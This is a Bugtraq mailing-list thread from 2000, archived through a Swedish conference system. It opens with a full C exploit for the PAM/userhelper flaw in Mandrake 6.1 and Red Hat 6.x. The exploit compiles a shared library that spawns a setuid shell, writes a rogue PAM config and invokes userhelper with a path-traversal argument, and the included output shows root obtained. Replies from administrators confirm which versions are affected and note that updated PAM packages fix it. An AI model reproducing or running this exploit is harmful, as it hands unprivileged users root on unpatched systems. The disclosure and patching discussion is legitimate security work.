4910853 2000-03-17  09:53  /60 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <10272>
Ärende: Exploit for Mandrake 6.1 (PAM/userhelper bug)
------------------------------------------------------------
/*
 * pam-mdk.c (C) 2000 Paulo Ribeiro
 *
 * DESCRIPTION:
 * -----------
 * Mandrake Linux 6.1 has the same problem as Red Hat Linux 6.x but its
 * exploit (pamslam.sh) doesn't work on it (at least on my machine). So,
 * I created this C program based on it which exploits PAM/userhelper
 * and gives you UID 0.
 *
 * SYSTEMS TESTED:
 * --------------
 * Red Hat Linux 6.0, Red Hat Linux 6.1, Mandrake Linux 6.1.
 *
 * RESULTS:
 * -------
 * [prrar@linux prrar]$ id
 * uid=501(prrar) gid=501(prrar) groups=501(prrar)
 * [prrar@linux prrar]$ gcc pam-mdk.c -o pam-mdk
 * [prrar@linux prrar]$ ./pam-mdk
 * sh-2.03# id
 * uid=0(root) gid=501(prrar) groups=501(prrar)
 * sh-2.03#
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
        FILE *fp;

        strcpy(argv[0], "vi test.txt");

        fp = fopen("abc.c", "a");
        fprintf(fp, "#include<stdlib.h>\n");
        fprintf(fp, "#include<unistd.h>\n");
        fprintf(fp, "#include<sys/types.h>\n");
        fprintf(fp, "void _init(void) {\n");
        fprintf(fp, "\tsetuid(geteuid());\n");
        fprintf(fp, "\tsystem(\"/bin/sh\");\n");
        fprintf(fp, "}");
        fclose(fp);

        system("echo -e auth\trequired\t$PWD/abc.so > abc.conf");
        system("chmod 755 abc.conf");
        system("gcc -fPIC -o abc.o -c abc.c");
        system("ld -shared -o abc.so abc.o");
        system("chmod 755 abc.so");
        system("/usr/sbin/userhelper -w ../../..$PWD/abc.conf");
        system("rm -rf abc.*");
}

/* pam-mdk.c: EOF */

___________________________________
Paulo Ribeiro	prrar@nitnet.com.br
(4910853) ------------------------------------------
Kommentar i text 4918771 av Brevbäraren (som är implementerad i) Python
Kommentar i text 4919435 av Brevbäraren (som är implementerad i) Python
Kommentar i text 4928480 av Brevbäraren (som är implementerad i) Python
Läsa nästa kommentar.
4918771 2000-03-20  11:23  /36 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <10294>
Kommentar till text 4910853 av Brevbäraren (som är implementerad i) Python
Ärende: Re: Exploit for Mandrake 6.1 (PAM/userhelper bug)
------------------------------------------------------------
on 3/14/00 5:14 PM, Paulo Ribeiro at prrar@NITNET.COM.BR wrote:

> * DESCRIPTION:
> * -----------
> * Mandrake Linux 6.1 has the same problem as Red Hat Linux 6.x but its
> * exploit (pamslam.sh) doesn't work on it (at least on my machine). So,
> * I created this C program based on it which exploits PAM/userhelper
> * and gives you UID 0.
> *
> * SYSTEMS TESTED:
> * --------------
> * Red Hat Linux 6.0, Red Hat Linux 6.1, Mandrake Linux 6.1.
> *
> * RESULTS:
> * -------
> * [prrar@linux prrar]$ id
> * uid=501(prrar) gid=501(prrar) groups=501(prrar)
> * [prrar@linux prrar]$ gcc pam-mdk.c -o pam-mdk
> * [prrar@linux prrar]$ ./pam-mdk
> * sh-2.03# id

It appears that Mandrake 6.0 is vulnerable too:

[darron@maul darron]$ gcc pam-mdk.c -o pam-mdk
[darron@maul darron]$ ./pam-mdk
sh-2.03# id
uid=0(root) gid=502(admin) groups=502(admin)
sh-2.03#
[darron@maul /etc]$ cat mandrake-release
Linux Mandrake release 6.0 (Venus)
--
Darron
darron@froese.org
<http://darron.froese.org/>
(4918771) ------------------------------------------
Läsa nästa kommentar.
4919435 2000-03-20  13:23  /20 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <10303>
Kommentar till text 4910853 av Brevbäraren (som är implementerad i) Python
Ärende: Re: Exploit for Mandrake 6.1 (PAM/userhelper bug)
------------------------------------------------------------
Tested systems..

Redhat 6.0 w/pam-0.68-10		- didnt work
Redhat 6.1 w/pam-0.68-7			- worked

Then on the same machine (having root and being the nice 'hacker' i
was, upgraded pam for him..  Then retested).

Redhat 6.1 w/pam-0.68-10		- didnt work

And that pam rpm is on the Redhat 6.1 update web site.

--
Matt Davis - ICQ# 934680
http://dogpound.vnet.net/
NoWonder UNIX Tech - http://www.nowonder.com

"!sgub evah t'nseod CP sihT ?sgub naem ayaddahW"
(4919435) ------------------------------------------(Ombruten)
Läsa nästa kommentar.
4928480 2000-03-22  09:14  /21 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <10337>
Kommentar till text 4910853 av Brevbäraren (som är implementerad i) Python
Ärende: Re: Exploit for Mandrake 6.1 (PAM/userhelper bug)
------------------------------------------------------------
	I tried this on a couple of my Mandrake 6.1 machines and it did
work.  Tried it on a Mandrake 7.0 box and it didn't work.  I went to
the Mandrake FTP site and downloaded a RPM of 7.0's PAM,
installed it, and everything seems happy now.

<snip>
>  * Mandrake Linux 6.1 has the same problem as Red Hat Linux 6.x but its
>  * exploit (pamslam.sh) doesn't work on it (at least on my machine). So,
>  * I created this C program based on it which exploits PAM/userhelper
>  * and gives you UID 0.
<snip>
>  * Red Hat Linux 6.0, Red Hat Linux 6.1, Mandrake Linux 6.1.
>  *
<snip>


Jeremy Gault
Systems Administrator - WingNET Internet Services
http://www.wingnet.net
(4928480) ------------------------------------------